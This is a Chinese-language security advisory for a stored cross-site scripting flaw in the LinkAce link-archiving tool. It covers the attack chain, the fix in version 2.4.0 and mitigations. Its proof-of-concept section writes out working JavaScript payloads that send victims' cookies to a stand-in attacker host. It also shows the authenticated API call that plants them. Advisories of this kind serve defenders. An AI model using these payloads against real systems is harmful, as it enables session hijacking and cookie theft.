CVE-2025-62722 CVSS 5.4 中危

CVE-2025-62722 LinkAce社交分享功能存储型XSS漏洞

披露日期: 2025-11-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-62722

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

LinkAce

漏洞概述

LinkAce是一款自托管的网站链接归档工具。在2.3.1及更早版本中，其社交媒体分享功能存在存储型跨站脚本(XSS)漏洞。该漏洞允许任何已认证用户在创建链接时，通过在标题字段中注入恶意HTML代码来执行任意JavaScript。当其他用户访问链接详情页并触发分享功能时，恶意脚本会在其浏览器中执行。攻击者可利用此漏洞窃取用户会话Cookie、冒充用户执行操作或传播恶意软件。此漏洞影响多个分享服务组件，属于客户端安全风险，但可能对整个应用的安全性造成严重影响。

技术细节

该漏洞存在于LinkAce的社交分享功能模块。当用户创建或编辑链接时，系统未对标题字段进行充分的HTML转义处理，直接将用户输入存储到数据库中。在链接详情页渲染可分享链接时，恶意代码被嵌入到页面HTML中并执行。攻击者只需在标题字段注入类似<script>alert(document.cookie)</script>的Payload即可触发漏洞。由于存储型XSS的特性，恶意脚本会持久化在数据库中，所有访问该链接的用户都会受到影响。漏洞影响AV:N网络攻击向量，PR:L低权限认证要求，UI:R需要用户交互才能触发。修复方案已在2.4.0版本中实施，主要通过输入验证和输出编码来消除XSS风险。

攻击链分析

STEP 1

信息收集

攻击者注册LinkAce账号，获取低权限用户凭证

STEP 2

漏洞利用准备

攻击者构造包含恶意JavaScript的XSS Payload，如<img src=x onerror='...'>或<script>标签

STEP 3

注入恶意代码

通过API或Web界面创建链接，在标题字段中注入XSS Payload并保存

STEP 4

持久化存储

恶意代码被未经消毒处理直接存储到数据库中

STEP 5

触发执行

受害者访问链接详情页，查看分享按钮时恶意代码被渲染执行

STEP 6

攻击完成

攻击者窃取受害者Cookie、冒充用户操作或传播恶意内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-62722 PoC - LinkAce Stored XSS
// Affected Version: LinkAce <= 2.3.1
// Fixed Version: LinkAce 2.4.0

// Step 1: Create a malicious link with XSS payload in title
const maliciousTitle = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';
const linkData = {
  url: 'https://legitimate-site.com',
  title: maliciousTitle,
  description: 'Benign description'
};

// Step 2: Send POST request to create link (requires authentication)
fetch('/api/v1/links', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <authenticated_user_token>'
  },
  body: JSON.stringify(linkData)
});

// Step 3: When victim views the link and share buttons are rendered,
// the XSS payload executes in victim's browser
// The onerror handler sends victim's cookies to attacker

// Alternative payload for session hijacking:
const sessionHijackPayload = '<script>fetch("https://attacker.com/log?data="+btoa(document.cookie))</script>';

影响范围

LinkAce < 2.4.0

LinkAce 2.3.1及以下版本

防御指南

临时缓解措施

立即将LinkAce升级到2.4.0版本以修复此漏洞。在升级前，可通过禁用社交分享功能、限制低权限用户创建链接、或在Web服务器层面添加XSS防护规则来缓解风险。建议审查现有数据库中的链接标题，清理可能的恶意内容。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表